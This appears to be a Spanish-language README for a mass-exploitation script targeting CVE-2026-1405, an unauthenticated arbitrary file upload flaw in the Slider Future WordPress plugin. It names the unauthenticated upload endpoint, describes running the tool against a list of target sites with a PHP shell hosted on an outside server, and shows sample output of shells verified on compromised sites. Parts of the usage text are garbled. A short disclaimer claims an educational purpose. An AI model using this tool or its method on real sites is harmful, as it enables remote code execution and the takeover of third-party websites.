
Slider Future <= 1.0.5 - Subida de archivos arbitraria no autenticada
Slider Future <= 1.0.5 - Subida Arbitraria de Archivos sin Autenticación
Componente: Slider Future (plugin de WordPress)
Versiones Afectadas: ≤ 1.0.5
Vulnerabilidad: Subida Arbitraria de Archivos sin Autenticación
CVE: CVE-2026-1405
Puntuación CVSS: 9.8 (Crítica)
El plugin Slider Future para WordPress es vulnerable a la subida arbitraria de archivos debido a la falta de validación del tipo de archivo en la función slider_future_handle_image_upload en todas las versiones hasta la 1.0.5 inclusive. Esto permite que atacantes no autenticados suban cualquier tipo de archivo, incluidos shells PHP maliciosos, directamente al servidor afectado, lo que habilita la ejecución remota de código.
/wp-json/slider-future/v1/upload-image/image_url (no se requiere autenticación).http://example1.com
https://example2.com
...
Ejemplo: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Se le solicitará:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url que apunta a su shell.Esta herramienta es solo para fines de pruebas de seguridad educativas y autorizadas.
El uso no autorizado contra sitios que no posee o para los que no tiene permiso explícito de prueba es ilegal.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt